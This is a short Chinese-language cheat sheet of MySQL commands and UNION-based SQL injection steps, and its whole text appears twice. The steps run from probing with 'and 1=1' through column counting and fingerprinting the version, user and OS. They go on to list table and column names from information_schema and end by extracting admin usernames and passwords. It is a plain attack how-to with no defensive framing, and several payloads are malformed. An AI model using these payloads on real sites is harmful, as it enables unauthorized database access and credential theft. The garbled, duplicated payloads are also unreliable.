SQL简单命令:
mysql -u username -ppassword -h ip //进入MYSQL数据库
show database; //查看数据库有哪些文件
select version(); //查看数据库版本
use admin; //选择admin数据库
show tables; //查看当前数据库有哪些表
select * from member; //查看member这张表有什么
注入步骤:
1,and 1=1 and 1=判断是否存在注入
2,存在注入 order by 查找表
3,union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- //两个减号注释,表示语句结束,可有可无。
//一般默认知道有admin这张表,用语句union select 1,2,3,4,5,6 from admin 但是很多时候需要自己查找,因此需要爆库爆表:union select and 1=2 1,2,3,4,5,6,7,8,9--//需要让它报错,报出关键字如加入and 1=2
mysql注入一般需要收集的信息:
version() //版本信息
database() //数据库名
user() //当前用户,如果当前用户为root,则可不用爆表,用其他攻击
@@version_compile_os //操作系统
4,union select and 1=2 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database //database是要爆的数据库,且转换为hex,即十六进制数.mysql数据库版本大于5.0,小于5.0版本用其他方法。参数group_concat是爆出数据库下的所有表名
5,union select and 1=2 1,2,group_concat(column_name),4,5,6,7,8,9,10 from information_schema.columns where column_name= //等于号后面写爆出的管理表名,且转为hex
6,此时知道数据库的表名,也大概知道基本结构,则用第三步操作,爆出管理员账号密码:
union select and 1=2 1,2,3,username,5,6,7,8,password,10 from admuse
mysql -u username -ppassword -h ip //进入MYSQL数据库
show database; //查看数据库有哪些文件
select version(); //查看数据库版本
use admin; //选择admin数据库
show tables; //查看当前数据库有哪些表
select * from member; //查看member这张表有什么
注入步骤:
1,and 1=1 and 1=判断是否存在注入
2,存在注入 order by 查找表
3,union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- //两个减号注释,表示语句结束,可有可无。
//一般默认知道有admin这张表,用语句union select 1,2,3,4,5,6 from admin 但是很多时候需要自己查找,因此需要爆库爆表:union select and 1=2 1,2,3,4,5,6,7,8,9--//需要让它报错,报出关键字如加入and 1=2
mysql注入一般需要收集的信息:
version() //版本信息
database() //数据库名
user() //当前用户,如果当前用户为root,则可不用爆表,用其他攻击
@@version_compile_os //操作系统
4,union select and 1=2 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database //database是要爆的数据库,且转换为hex,即十六进制数.mysql数据库版本大于5.0,小于5.0版本用其他方法。参数group_concat是爆出数据库下的所有表名
5,union select and 1=2 1,2,group_concat(column_name),4,5,6,7,8,9,10 from information_schema.columns where column_name= //等于号后面写爆出的管理表名,且转为hex
6,此时知道数据库的表名,也大概知道基本结构,则用第三步操作,爆出管理员账号密码:
union select and 1=2 1,2,3,username,5,6,7,8,password,10 from admuse